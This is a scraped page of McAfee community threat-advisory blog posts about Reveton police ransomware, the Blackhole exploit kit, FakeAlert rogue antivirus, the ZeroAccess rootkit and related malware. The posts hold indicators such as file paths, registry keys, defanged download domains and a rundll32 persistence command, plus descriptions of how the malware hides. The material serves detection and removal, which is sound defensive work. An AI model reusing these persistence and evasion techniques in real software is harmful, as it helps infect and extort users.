Skip navigation
McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams
1 2 Previous Next

Top Threats

19 Posts
0

“Your PC is blocked”: Background of the Police Ransomware Virus 

 

Reveton – the universal extortion instrument

 

Researchers have been investigating not just the intricacies of the malware code that these ransomware programs deploy to infect your computer, but the money trail that is left by those who either don't know where to turn for help, or are intimidated by the threats included in the ransomware's blocking screen.

 

A French security expert and blogger known by the handle Kafeine and his colleagues from the botnets.fr project have managed to access a BlackHole exploit panel associated with Reveton distribution.

 

Blackhole and Styx exploit kits are often used to infect systems with this ransomware, and the most effective means of infection is by exploiting weaknesses in Java. The control panel shows this clearly.

breakdown-of-statistical-data.png

 

Once a system is infected there is always the possibility that the user will look for ways to remove it, either by searching the internet for removal guides or by seeking help online in one or other of the self-help forums. Probably only rarely will a user pay to have the infection removed since the cost of doing so is likely to be nearly as much as the ransom demanded, and the fear and embarassment factor will mitigate against allowing outsiders to have access to the system.

 

What this means is that the success rate, for the ransomware distributors, is going to be less than they might hope for (which is why some of them are now resorting to encrypting files). The proportion of users who pay the ransom seems to differ from country to country, but the calculations derived from access to the control panel indicate that the controllers can count on receiving about 40,000 Euros per day. And that is from just one operation among many.

 

revenue-from-european-countries.png

 

The money, of course, has to be laundered to get it back to the controllers, and they will expect to receive only a part of that 40,000 Euros. Laundering money costs money. Assuming that half of that amount goes to intermediaries, they will still get in the region of 7 million Euros a year for their efforts.

 

Kafeine from botnets.fr has outlined the entire infrastructure of Reveton distribution and monetizing details in the following graphic:

infrastructure-of-reveton-distribution-and-monetizing.png

 

 

 

These screenshots were taken from the privacy-pc.com report (see below), which has a link to an earlier analysis of the FBI Moneypak ransomware containing removal guides.

 

http://privacy-pc.com/news/your-pc-is-blocked-background-of-the-police-ransomwar e-virus.html

4

Compromised websites have been an attractive target for cyber-criminals. These websites distribute different malwares designed to steal valuable information from the victim’s machine

Compromised websites has scripts, iframe to redirect or download other malwares.

fakeav1.jpg      fakeav2.jpg

The link to the compromised website may arrive via email as part of a spam campaign to lure the user into clicking the malicious link. After accessing the compromised website, it shows a fake message box about critical process activity on the computer.

fakeav3.jpg

On clicking the OK button, it opens a .PNG file hosted in the compromised site. This .PNG file shows a fake alert image pretends to be from a security product that scares the user into thinking the computer is infected by critical malware and suggests that the user clean the computer.

fakav4.jpg

The compromised website has another iFrame that allows downloading a malicious file when the user attempts to click on the .PNG file.

fakeav5.jpg

Upon executing the malicious file, it shows variety of fake security alerts and warnings. Also, this rouge variant uses a different GUI, depending on the version of the operating system it infects.

fakeav6.jpg

As on windows 7:

fakeav7.jpg

Windows vista;

fakeav8.jpg

Finally, it attempts to convince the user to purchase the full version of fake product.

McAfee strongly recommends that users exercise caution when opening unsolicited emails. Ensure your anti-malware protection is up to date. Use a reputable firewall. Beware of drive-by downloads when visiting any new websites. McAfee detects this malware as “FakeAlert-FFO” and the .jar file as “Exploit-CVE2012-1723”.

5

A new version of RootkitRemover is now available : http://www.mcafee.com/us/downloads/free-tools/rootkitremover.aspx

 

The new version contains some excellent ZeroAccess removal features.

 

We very much  value your feedback, so please do let us know if you use the tool and if it solved your issue.

 

Thanks!

 

 

0

If you use the internet (and if you're reading this then it's pretty safe to assume you do)  then you run the risk of your machine getting infected with malware. Infection vectors are wide and varied, and even a website that you've visted 1000 times before and you thought was safe could be loaded with malware the next time you click. There are some great documents and discussions on this site on how to stay protected, but even with the best defence mechanisms there is still unfortunately a chance that something nasty will slip through the net.

 

Most malware these days, somewhere down the line, is money-driven - be it from attempting to swindle you into buying fake anti-virus "software" or paying ransom money to have your files decrypted (and then selling on your credit card details too), or by stealing your online banking password or intercepting transactions in the browser. And where there's an illicit opportunity to make money, there will generally be people willing to take that opportunity - so the new malware just keeps on coming.

 

Some infections are easy to spot - if you have Fake-AV or Ransomware then you'll know about it . Others are stealthier and lurk inthe background doing their best to go un-noticed, and it's only when you check your bank balance that you see something untoward has occurred.

 

There is help at hand though, it's totally free and it's available for you to use if you think you've got an infection on your pc:

 

Stinger is McAfee Labs' free standalone removal tool - it is released on a daily basis and at the time of typing this it covers nearly 6000 malware familes, including Vundo, Autorun.worm, Xpaj, ZeroAccess, Blacole, Zeus and a whole host of FakeAlerts, Backdoors, downloaders, password stealers and banking trojans.

 

It might just be the droid you were looking for....

3

W32/Autorun.worm.aaeb-h

Posted by SamSwift Nov 30, 2012

McAfee has received multiple reports of corporate customers who are severely affected by variants of W32/autorun.worm.aaeb-h.

 

Impact:

W32/Autorun.worm.aaeb-h has the ability to infect removable media devices and mounted network shares. It can also copy itself into .zip and .rar archive files.

The infection starts either with manual execution of an infected file or by navigating to a folder that contains infected files. This threat has the ability to download other malware or updates to itself as directed by a Command-and-Control (C&C) server.

This threat is server-side polymorphic, therefore there is potential for new variants. McAfee Labs are continuing to closely monitor the situation and will provide enhanced generic detection as needed.

 

Mitigation:

Coverage for the majority of variants are in the current DAT update files, however McAfee have also released an additional Extra.DAT and Stinger to detect and clean this threat.

To download the Extra.DAT and Stinger, see KB76807:
https://kc.mcafee.com/corporate/index?page=content&id=KB76807

 

For more information on McAfee product coverage and mitigation for this threat, see PD24169 - Threat Advisory: W32/Autorun.worm.aaeb:
https://kc.mcafee.com/corporate/index?page=content&id=PD24169

 

 

 

 

0

Blackhole detections 2H2011.JPG

 

The Blackhole Exploit kit has received a complete makeover. The authors have completely rewritten the code in order to evade detection by the majority of anti-virus programs. This exploit kit is probably the most successful (and, for PC users, most dangerous) piece of malware around at the moment, and it relies for its success on users who haven't updated operating systems, browsers, and widely-used applications such as Flash, Adobe Reader and Java.

 

http://www.infoworld.com/t/malware/blackhole-exploit-kit-gets-upgraded-evade-ant ivirus-software-202263

The creators of the infamous Blackhole exploit kit have announced version 2.0 of the malware, claiming to have rewritten the code entirely from scratch so as to evade popular antivirus software. The kit includes noteworthy and nasty tricks, such as the use of short-term, random URLs for delivering exploits, but perhaps in recognition of the still-struggling global economy, the kit's creators aren't changing pricing.

 

According to Sophos, the Blackhole exploit kit is "the most popular drive-by malware we've seen recently.... It offers sophisticated techniques to generate malicious code. And it's very aggressive in its use of server-side polymorphism and heavily obfuscated scripts to evade antivirus detection. The end result is that Blackhole is particularly insidious."

 

In the past few months alone, malicious hackers have used Blackhole to exploit an unpatched MSXML flaw; to exploit Java vulnerabilities; to infect users with fake AV (antivirus) programs via Twitter spam campaigns; and to distribute the GameOver Trojan via a fake U.S. Airways-themed email campaign.

 

 

Blackhole 2.0 also has been trimmed of old exploits that have since been fixed, replacing them with a new batch. Further, the creators have broadened the number of OSes the malware can recognize, adding to the list Windows 8 and unspecified mobile platforms, "giving the attacker the ability to break down the amount of traffic he's getting from machines running each individual OS" .

 

The exploit kit is customisable, so the list of exploits given in the InfoWorld article above is certainly incomplete.

 

 

Top exploits 1H12.bmp

The latest Security Intelligence Report from Microsoft (vol. 13) has this to say about the exploit kit in its Summary Section -

Blacole, a family of exploits used by the so-called “Blackhole” exploit kit to deliver malicious software through infected webpages, was the most commonly detected exploit family in the first half of 2012.

 

Prospective attackers buy or rent the Blacole kit on hacker forums and through other illegitimate outlets. It consists of a collection of malicious webpages that contain exploits for vulnerabilities in versions of Adobe Flash Player, Adobe Reader, Microsoft Data Access Components (MDAC), the Oracle Java Runtime Environment (JRE), and other popular products and components. When the attacker installs the Blacole kit on a malicious or compromised web server, visitors who don’t have the appropriate security updates installed are at risk of infection through a drive-by download attack.

 

These attacks frequently use Javascript or IFrames to execute a drive-by attack, one in which simply visiting a compromised website is sufficient to activate the malicious code and download malware to a user's system.

 

A drive-by download site is a website that hosts one or more exploits that target specific vulnerabilities in web browsers, and browser add-ons. Malware distributors use various techniques to attempt to direct Internet users to Web sites that have been compromised or are intentionally hosting hostile code. Users with vulnerable computers can be secretly infected with malware simply by visiting such a website, even without attempting to download anything themselves.

 

This technique usually involves posting exploit code to a legitimate website, either by gaining access to the site through intrusion or by posting malicious code to a poorly secured Web form, like a comment field on a blog. In most cases, the exploit code itself is hosted on a different website and is exposed through the compromised webpage using a technique like a URL embedded in malicious script code or an inline frame, called an IFrame for short. An IFrame is an HTML document that is embedded in another HTML document.

 

During a drive-by download attack, an IFrame is typically used to load a separate HTML page into a window on the current page. Inline frames can be as small as a single pixel making them impossible to detect with the naked eye. Because the IFrame loads another webpage, it can be used by criminals to place malicious HTML content, such as a script that downloads and installs malware, into non-malicious HTML pages hosted by trusted websites.

 

(Microsoft Security Blog, December 8 2011)

 

 

Further information :

 

"What You Should Know About Drive-By Download Attacks - Part 1" (Microsoft Security Blog, December 8 2011)

"Same Operation, Diversification of Targets Being Spoofed: Current Black Hole Exploit Kit Spam Runs"  (Trend Micro, June 12)

"The Rise of the “Blackhole” Exploit Kit: The Importance of Keeping All Software Up To Date" (Microsoft Security Blog, July 19)

"Voice Mail Notifications and ADP Emails Lead to Blackhole Exploit Kit"  (Websense, September 13)

"Blackhole Exploit Kit updates to 2.0 "  (Websense, September 13)

"Blackhole 2.0 Beta Tests In The Wild?"  (Trend Micro, September 14)

"The various spam campaigns leading to Blackhole"   (Help Net Security)

 

"McAfee Labs Threat Advisory - Blackhole Exploit Kit"

Microsoft Encyclopedia entry : JS/Blacole

Microsoft Encyclopedia - detailed description of JS/Blacole


"Microsoft Security Intelligence Report Vol. 13"

3

McAfee Labs' own Peter Szor and Guilherme Venere have written two excellent blogs around these attacks:

 

http://blogs.mcafee.com/enterprise/security-perspectives/skywiper-fanning-the-fl ames-of-cyber-warfare

 

http://blogs.mcafee.com/mcafee-labs/jumping-in-to-the-flames-of-skywiper

 

Today's Stinger will contain coverage for W32/Skywiper, also detection is already available in our DAT files.

 

Our ThreatCenter has further information which can be found here.

 

Skywiper page now available on McAfee.com and McAfee Labs whitepaper

 

 

************************

Update:

 

New blogs posted from Francois Paget, Peter and Guilherme:

 

http://blogs.mcafee.com/mcafee-labs/what-the-skywiper-files-tell-us

 

http://blogs.mcafee.com/mcafee-labs/spreading-the-flame-skywiper-employs-windows -update

 

Threat Advisory available in the McAfee ServicePortal here

 

************************

12

computer-crime-fake (1).png

 

This is one member of an entire family of malware known as ransomware.  The aim of those producing and spreading this ransomware is to intimidate and blackmail users whose PCs are infected and persuade or force them to pay for having the malware removed or neutralised. As a form of cybercrime it is crude, but often effective - often enough that the authors have gone to some lengths to customise this particular variety for different countries in Europe (so far, only a few examples from outside Europe have been seen).

 

The basic mechanism is simple enough. A PC is infected with a Trojan dropper by visiting an infected website. The actual infection can be the result of a "drive-by", where simply going to an infected webpage is enough to download the Trojan. Once on the PC, the code inserts a registry entry to make sure that it will be run every time the PC starts up, then displays a country-specific picture and a message (completely obscuring the desktop) and apparently locks the PC.  The full details are in a paper by Trend Micro, which explains it better than I can.

 

Newer variants of this ransomware are said to have been modified to encrypt files and overwrite the MBR. If that is true, it confirms that the authors are actively developing it and intend to keep it going as long as  possible.

 

One of the first articles to draw attention to this ransomware appeared last December in Microsoft's Malware Protection Center, when most of the infections were being reported from Germany (the BundesPolizei variant) :

http://blogs.technet.com/b/mmpc/archive/2011/12/19/disorderly-conduct-localized- malware-impersonates-the-police.aspx

 

Considering the wide distribution of scams such as this ransomware, it's clear that there's a lot of money at stake. That's why the bad guys invest in making their scams look more convincing for the unsuspecting user. This includes adapting social engineering techniques to the specifics of various countries and pretending to be the local authorities. Another point to remember is that a lot of malware is distributed nowadays through exploit kits such as Blackhole.

 

The note above about the Blackhole Exploit Kit is confirmed by a forum post, dated a fortnight before this article appeared, which said that

 

... Microsoft security essentials showed up 2 severe threats:

Exploit.java/Blacole.BX - severe

Trojan:Win32/Reveton.A

 

Trojan/Win32/Reveton was the subject of another article in Malware Protection Center on April 18th : "Revenge of the Reveton". The malware infection is classed by Microsoft as Severe, and a description and removal guide can be found HERE. It is important to note that this infection is the intermediate variant that purports to be from the Metropolitan Police : later variants may require a different removal process.

 

Trojan:Win32/Reveton.A arrives as a DLL file with a random name. It creates a shortcut file to itself in the Windows startup folder; the shortcut file name is the same name as the DLL file but with the LNK extension.

 

When Windows starts, it executes the command associated with the shortcut, as follows:

rundll32.exe <path>\<file name>.dll, <random exported name>

Payload

Prevents the user from accessing the desktop

When run, Trojan:Win32/Reveton.A displays a full-screen webpage that covers all other windows, rendering the computer effectively unusable. The image is a fake warning pretending to be from a legitimate institution. It demands the payment of a supposed fine. However, even if the user pays, the computer is still left unusable.

 

Downloads and executes other malware

Trojan:Win32/Reveton.A downloads and executes other malware, detected as PWS:Win32/Reveton.A.

 

What Microsoft calls PWS:Win32/Reveton.A is a refinement apparently added to this ransomware variant :

This threat is classified as a password-stealing trojan. Typically, a password stealing trojan installs a keystroke logger (commonly referred to as a keylogger) which records keystrokes and sends the recorded information to remote attackers. Some keyloggers monitor only keystrokes involved in specific types of web-based transactions. For example, a keylogger may include a component that monitors browser activity, only recording keystrokes when certain bank or ecommerce sites are accessed. Other types of password-stealing trojans include those that capture screenshots in an attempt to bypass graphic-based security measures.

 

The advice to anyone who has fallen victim to this version of the ransomware is the usual :

 

What to do if you think you have been a victim of a scam

If you suspect that you've responded to a phishing scam with personal or financial information, take these steps to minimize any damage.

  • Change the passwords or PINs on all your online accounts that you think might be compromised.
  • Place a fraud alert on your credit reports. Check with your bank or financial advisor if you're not sure how to do this.
  • Contact the bank or the online merchant directly. Do not follow the link in the fraudulent email message.
  • If you know of any accounts that were accessed or opened fraudulently, close those accounts.
  • Routinely review your bank and credit card statements monthly for unexplained charges or inquiries that you didn't initiate.

 

 

The whole subject of these "Police Trojans" has been investigated in depth by Trend Micro, who published their findings in a White Paper. The blog entry where the White Paper is discussed asserts that the same people are likely to be behind this as were responsible for a DNSChanger Trojan that had been sponsored by Rove Digital. That particular group was taken down last November when 8 Estonians were arrested, but the Police Trojans continue to be modified, enhanced and released - so there are others involved. There are clues within the source code, apparently, that point to Russian-speakers as being the authors of this malware (although such "clues" could be deliberately planted in order to mislead the investigators).

 

The Trend Micro blog is at http://blog.trendmicro.com/trojan-on-the-loose-an-in-depth-analysis-of-police-tr ojan/

 

The DNSChanger Trojan is the same one that has recently been in the news : the FBI's Operation Ghost Click, which was the subject of a recent post in Security Awareness ("Did the FBI say we should check to see if computer is infected?")

 

The story of the takedown of Rove Digital and its criminal operations - spam, fake pharmaceuticals and malware - can be found at http://blog.trendmicro.com/esthost-taken-down-biggest-cybercriminal-takedown-in- history

 

The White Paper

(http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-pape rs/wp_police_trojan.pdf)


This analyses the operation and external communications of the Police Trojans in some detail. It also provides an explanation for the patchy detection rate by anti-virus programs, and the difficulty in keeping track of changes to the Trojans :

... there must be an affiliate download site where partners can download a ready-made Trojan using their own user names and the C&C server of the day already embedded. This also explains the very low detection rates across the board. Each Trojan is custom compiled with different configurations and applies two layers of packing and obfuscation on top. Given the rate at which the attackers are changing C&C servers, this recompilation must be happening very often that is why security companies are having a difficult time obtaining good detections.

 

The cybercrime activities of the authors of this ransomware are identified, showing that these are professional (or at least semi-professional) cybercrooks -

The gang spreading the ransomware discussed in this research paper does not seem to be a novice in committing cybercrime. In fact, we can relate the ransomware Trojan to several data-stealing campaigns involving ZeuS and CARBERP Trojans, TDSS rootkits, and FAKEAV malware dating back to 2010 and 2011. We can also relate the Police Trojan gang to a ZeuS Trojan campaign launched in mid-March of this year and a Gamarue worm.

 

.... The TDSS samples we have seen in Police Trojan attacks were also the DNS changers Rove Digital’s affiliate program used. As such, we believe that one or some of the gang members spreading the Police Trojans may also have been members of Rove Digital’s affiliate program in the past. This shows that the gang is certainly not new to cybercrime.

 

The probable source(s) of infection are set out at the end of the White Paper. The authors' conclusions about the websites that cause the infection should come as no surprise.

 

These malware programs tend to exploit known vulnerabilities in programs such as Java and Flash, for which updates are available but may not have been downloaded and applied. Some can exploit security weaknesses in Windows (most often XP); if the fixes for these issues by Microsoft are in the Optional download section (unlikely, but possible) then some users may not be aware of them.

 

To check whether your PC is missing any Windows or other Microsoft updates you should go to the Microsoft Update website (for which you must be using Internet Explorer; go to the Microsoft Download Center if you are using another browser such as Chrome or Firefox) or run Microsoft's MBSA, which scans for a number of security vulnerabilities in your OS and browser. For Adobe Flash, you can check whether you have the latest version here (different versions must be downloaded for IE and Firefox; Chrome should update its own sandboxed version automatically).

 

West Yorkshire Police virus.jpg

 

As a footnote to this piece, I note that there is a recent ransomware variant - purporting to be from West Yorkshire Police here in the UK - which has some extra features missing from earlier variants. Many files are encrypted - including .doc and .pdf - and are given a prefix of 'Locked' and a random 4-character suffix. A Russian AV vendor (Dr.Web) classifies this variant of the ransomware as "Trojan.Matsnu.1" and can decrypt the files, provided that they receive both an encrypted file and its unencrypted (pre-infection) version. This implies that the file has been backed up and so is available for comparison - which reinforces the message that files should be backed up  regularly.

4
5

Innovative Marketing, a notorious purveyor of Fake AV programs, has finally been persuaded - under extreme pressure - to reimburse a large number of people who were duped by their "Your PC is infected ..." scareware into buying their worthless programs.

 

The company had its headquarters in the Ukraine, but with subsidiaries in the United States and elsewhere. The refunds appear to be for victims in the US only, where the FTC took action against the company in 2008.

 

In the US, at least 320,000 people will receive a refund of about $20. The figure of 320,000 represents only those in the US who are known to have paid Innovative for one of their scareware products : the list of those products is extensive, since the same underlying program code would have numerous user interfaces and product names.

 

The number of people eligible for a refund is expected to grow, since the FTC is inviting anyone who paid for one of Innovative's "antivirus" programs, and who does not receive a refund, to contact them.

 

Anyone outside the US has very little chance of ever receiving any compensation.

 

A list of some of the names of the Fake AV and other programs peddled by Innovative Marketing can be found on the Microsoft website at

http://blogs.technet.com/b/mmpc/archive/2011/12/14/ftc-to-refund-rogue-security- software-victims.aspx

 

Some of the names used :

SpyGuarder

SpyKiller Pro

Spyware Sweeper

SpywareIsolator

SwiftCleaner

SystemDoctor

SystemErrorFixer

SystemSweeper

TotalAntivirus

Trasheraser

Trustedprotecion

UltimateCleaner

VirusRemover 2008

WinAntiSpyware

WinAntiVirusPro

WinBugFixer

WinDefender2008

WinFixer

Winsecureav

WinSpyware Protect

WinxDefender

XLifeGuarder

XP AntiSpyware 2009

XP AntiVirus

 

A brief news article about this happy event, with some of the historical background, is at

http://www.pcworld.com/article/246366/ftc_compensates_320000_victims_of_fake_ant ivirus_scams.html

 

The FTC announcement can be found at http://www.ftc.gov/opa/2011/12/rebates.shtm

12

OpenCloud Security FakeAlert are commonly found to be installed by other trojandownloaders. These trojans usually arrive as e-mail attachments, or via drive-by-downloadattacks exploiting vulnerabilities in Windows and third-party applications.

Upon execution, It copies itself to the following paths:

 

  • %USERPROFILE%\Application Data\ OpenCloudSecurity\OpenCloud Security.exe
  • %ALLUSERSPROFILE%\Application Data\ OpenCloud Security\OpenCloud Security.exe

This FakeAlert evolves its appearance and may present itself using one ofthe following graphical user interfaces:

avsec1.jpg

 

 

This infection will also terminate the majority of programsthat you attempt to run.

When you start an executable it will automatically beclosed and you will then be shown a security warningfrom the Windows taskbar stating that the program is infected.

 

avsec2.jpg

While running, this fakealert will display a variety of fake security alerts and warnings . The various alerts are shown below:


avsec3.jpgavsec6.jpg

 

avsec7.jpg

 

Mitigation:

Mitigation

 

  • Users should be cautious with suspicious e-mailattachments.
  • Users should apply the latest security patches for Windows and third-party applications including the following, which are popular targets:
    • Internet Explorer
    • Microsoft Office (Excel, Word, PowerPoint, etc.)
    • Adobe Reader
    • Java
    • Flash Player
    • RealPlayer
    • QuickTime
  • Users should browse the website cautiously, avoid to browse unknown site.

 

Note: If you are already infected with the this fakealert and not able to execute anything.

Start the machine in 'Safe Mode with Networking' and run the McAfee FakeAlert Stinger <http://www.mcafee.com/us/downloads/free-tools/fake-alert-stinger.aspx>

keep the sensitivity Level to 'very high' , it is 'verylow' by default.

1

The threats are also “protecting” themselves.

 

The most recent makes part of a family of Rootkits. ZeroAccess as it is called, replaces Windows System files and installs kernel hooks in attempt to remain stealth. ZeroAccess utilizes an advances method for protecting itself and disabling any security tool trying to detect and remove it.

 

ZeroAccess is usually installed on a system by a malicious executable disguised as a cracking tool for popular applications. Once this dropper is executed, it will perform some actions like:

 

  • The rootkit will create a file with a random name in %SYSTEMROOT%\system32\config\<random> or c:\windows\prefetch\<random>. This file will be used to store a virtual encrypted file system, used by the rootkit to store its configuration files and other supporting files.
  • ZeroAccess will then patch a randomly chosen system driver file. The patched file will be used as the rootkit’s restart mechanism to load its malicious kernel component when the system boots.
  • The original system driver file is stored inside the virtual file system. The rootkit uses it to provide legitimate information for requests to access the original file information on disk such as md5, digital signature, including a file copy.
  • The malware will also create a tripwire device. This device is disguised as a normal file on disk, but whenever accessed, it will trigger the rootkit protection routine.
  • In older variants, the tripwire device used to be named like \\??\Global\systemroot\system32\svchost.exe.
  • In new variants, the tripwire device is installed in an Alternate Data Stream (ADS).

               NOTE: An ADS is an NTFS structure that allows more than one data stream to be associated with a file.

  • The rootkit tripwire device ADS is usually installed as %SYSTEMROOT%\<randomnumbers>:<randomnumbers>.exe.

               Example: \systemroot\3155945044:2870600771.exe

  • The malware then creates a service, and points its ImagePath to the tripwire device, to run it every time the system boots.
  • Whenever the tripwire file or the process in memory is accessed by a security tool, the rootkit kernel component will kill the process from the kernel.
  • In newer variants, besides killing the process, the rootkit component will also remove all NTFS permissions from the offending files. This action is an attempt to disable security related tools and components.

 

ZeroAccess also establish a network activity to reporting the installation and user activity to a remote server. Since the rootkit hides network connections from any tool running on the infected machine, system administrators may need to use external monitoring tools to check the network activity.

 

We are seeing ZeroAccess associated with other malware families, as FakeAlert and Katusha.

 

For more details of this threat and remediation steps, please read here.

 

Be Safe Today, Not Tomorrow !!!!

1

Our systems are attacked daily byTrojans, viruses, worms, and other malware. We face these risks while browsingthe Internet, chatting, downloading applications, and in many other ways. We know we have to protect our systems and that we need to use security software.Unfortunately, one of the most popular ways for the bad guys to make money isto trick users into believing their systems are infected. They convenientlyoffer to sell us fake, or rogue, security applications that often do little more than act busy and collect our money.


How harmful are rogue security applications?

FakeAlert anti-virus software can be harmful to your systems. FakeAlert Trojans operate in a similar way: We get them either during a “drive-by” install or a downloader will silently load either part of or an entire roguesecurity application.
Rogue software can sometimes damage the system and harm other drivers andutilities.

We use several detection names for fake anti-virus software, including FakeAlert-Antiviruspro, Rogue Antispyware, and Fraudtool.

 

Demonstration:-

Let’s look at one example of fakealert software: When sysguard.exe runs on a victim’s machine, it infects the system and deletes the registry key of the AppInit_DLLs applications from the machine:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"AppInit_DLLs

The user sees the warning message in the next screenshot , and these registrykeys are added:

HKEY_CURRENT_USER\Software\AvScan
HKEY_CURRENT_USER\Software\Microsoft\Windows Script
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings


When this pop-up window warns of a (fake) infection, most users click on “Yes,remove threats.”

beware.bmp

What happens next?

As we see in the previous screen,once the Trojan runs it offers a graphical interface designed to appear as alegitimate security application. It reports multiple “infections” on thevictim’s computer. It also adds the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\WindowsScript\Settings "JITDebug"

Finally the fakealert software offers the user the chance to clean up the attack by buying the “full” rogue application. (See next screen.) Once the victim pays, the attacker has won. And the user’s machine remains infected by the rogue product.

 

beware2.bmp

How can you protect your system?


The first step in protectingyourself is to download the McAfee SiteAdvisor tool, which will warn you beforeyou visit the suspicious links.

McAfee anti-virus products such as VirusScan Enterprise 8.x have features that can help your PC. VSE adds user-defined rules and protects your system against fakealert trojans.

You should also update your McAfee products to ensure you are protected from these threats.

You can help by sending us a sample for analysis in a password-protected ZIP file. (Use the password “infected”).For more details on how to submit fake alert related samples, please visit this link: https://community.mcafee.com/docs/DOC-2752

Please use our updated McAfeeFakeAlert Stinger tool to protect your system,which detects and remediates fakealert threats

http://www.mcafee.com/us/downloads/free-tools/fake-alert-stinger.aspx

1

Fakealert-Sysdef

Posted by nchattop Aug 9, 2011

Many people try to search for free antispyware, install something purporting to be genuine, but unknowingly become victimized and land up paying two fold - by damage caused to their system and potentially by later parting with credit card details to remove bogus infections.

 

One of the most popular current fakealert variant seen is "Fakealert-Sysdef"

 

The tool are advertised like – System Repair, WinXPRecovery, XP Security

 

fakealert1.bmp

 

FakeAlert may install itself onto your PC without your permission, via a drive-by attack on a compromised website.

 

If victim tries to stop the scanner, it won’t close rather force the victim to complete the scanning and displaying fake warnings and trick them into buying rogue antispyware programs

 

fakealert2.bmp

Often fake-alert infections will prevent the machine from working as expected. This makes the threat persistent and prevents users from remediating the infection.In some cases, fake-alert infections will hijack certain Windows Registry Keysthat associate applications based on file extensions.

 

%UserProfile%\Desktop\Windows XP Repair.lnk

%UserProfile%\Start Menu\Programs\Windows XPRepair\Windows XP Repair.lnk

%UserProfile%\Start Menu\Programs\Windows XPRepair\Uninstall Windows XP Repair.lnk

 

it connects to the following sites to download other malicious files.

    • hxxp://click[removed].org
    • hxxp://find[removed].org
    • hxxp://click[removed].org


To stay safe online we recommend users  buy proper AV like McAfee, keep their software and operating system patches updated, and ensure security best practices are followed at all times.

2

XP-InternetSecurity-2012

Posted by Nitin Kumar Aug 3, 2011

There is another 2012 fakeAV with a commonly known name ‘XPInternet Security 2012’ and 2011 is still not completed.

This Fake AV looks same as ‘XP Security 2012’ (check blog @ https://community.mcafee.com/community/security/top_threats/blog/2011/07/25/xp-s ecurity-2012 )

When it is successfully executed, it shows whole system just of pile of malicious files.

int1.jpg

It is really scary if one who is not aware of this rogue AV look at this picture, what is the next step to do- Get rid of these viruses andhow to do it – get registered for this software.

This is not free, go to registration page which has a user reviews for same software to look genuine.

int2.jpg

int3.png

Now one more step - Buy this software and scan with it, that’sthe Catch! – Attack Successful.

User should be careful about these fake AV , should not download any fakeAV from other than genuine site. Especially when it comes to spend money, first confirm that you are buying genuine product.

Have the updated Anti-Virus and enable real time scanning. McAfee detects this as FakeAlert-Rena.* variant.

 

If you are infected any fakealert, download McAfee FakeAlert Stinger < http://www.mcafee.com/us/downloads/free-tools/fake-alert-stinger.aspx > and scan the system with this, also start a discussion at McAfee Top Threat community < https://community.mcafee.com/community/security/top_threats >.

 

Do not surf malicious site- Use SiteAdvisor ( http://www.siteadvisor.com/ ).

1 2 Previous Next